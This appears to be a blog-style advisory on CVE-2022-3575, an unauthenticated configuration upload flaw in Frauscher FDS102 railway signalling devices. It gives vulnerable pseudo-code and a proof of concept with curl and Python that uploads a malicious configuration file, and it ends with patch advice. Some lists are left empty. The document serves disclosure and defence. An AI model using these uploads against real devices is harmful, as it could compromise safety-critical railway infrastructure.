CVE-2022-3575 - How a Simple Configuration Upload Can Compromise Frauscher FDS102 Devices

In this post, we’re diving into CVE-2022-3575 — a real-world example of how a feature meant to make life easier for administrators ended up exposing critical Frauscher Sensortechnik GmbH railway safety devices to remote compromise, all thanks to a missing piece: authentication. We’ll break it down in easy language, show some proof-of-concept, and link to original sources for further reading.

From v2.8. up to v2.9.1

These devices are often found in railway signaling systems where reliability and security are a must.

What’s the Vulnerability?

The core problem: The FDS102 devices offer a configuration upload function over the network. Unfortunately, from version 2.8. to 2.9.1, this function does not enforce any authentication. Anyone who can reach the web interface can upload arbitrary files, including malicious code, directly to the device. This can lead to:

Real-World Impact

Why does this matter? FDS102 devices are used in safety-critical environments. If a threat actor uploads a backdoor or changes the logic, people and infrastructure are at risk.

Technical Details

The upload endpoint is typically accessible on a known port (e.g., TCP 80 or 443) using the device’s management web interface. No login is required. Here’s a simplified look at the weak logic:

# Pseudo-code representation; not the actual device code
def upload_configuration(request):
    # Vulnerable: No authentication check at all!
    config_file = request.files['config']
    save_file('/etc/frauscher/configs/', config_file)
    apply_config('/etc/frauscher/configs/' + config_file.filename)
    return "Upload successful"

Proof of Concept: Exploiting CVE-2022-3575

Let’s say you know the IP address of an affected FDS102 device. You can exploit it in a few lines using curl, Python, or an HTTP tool.

Example 1: Curl Upload

Assume the upload endpoint is at /uploadConfig

curl -X POST http://TARGET-IP/uploadConfig -F "config=@malicious_config.xml"

This doesn’t ask for any login — the malicious file is accepted and applied right away.

Example 2: Python Script

import requests

url = "http://TARGET-IP/uploadConfig"
files = {'config': open('malicious_config.xml', 'rb')}
response = requests.post(url, files=files)
print(response.text)

If the device’s configuration parser isn’t securely written, you could even upload executable scripts or backdoors.

Mitigation

Official Fix:  
Frauscher recommends updating to v2.9.2 or higher, where authentication is enforced for the config upload function.

Related References

- Frauscher Sensortechnik Security Advisory (pdf)
- VDE CERT - CVE-2022-3575
- NIST NVD CVE Entry

Key Takeaway

Ignoring authentication on any function that touches configuration (or uploads files!) is a major design flaw that attackers love. Always require authentication — especially on industrial equipment that keeps people safe.

If you’re running any version of the Frauscher FDS102 between 2.8. and 2.9.1, patch NOW.

*This post is exclusive and simplified for easy understanding and serves as a heads-up to anyone managing or auditing OT/ICS environments.*

Timeline

Published on: 11/02/2022 17:15:00 UTC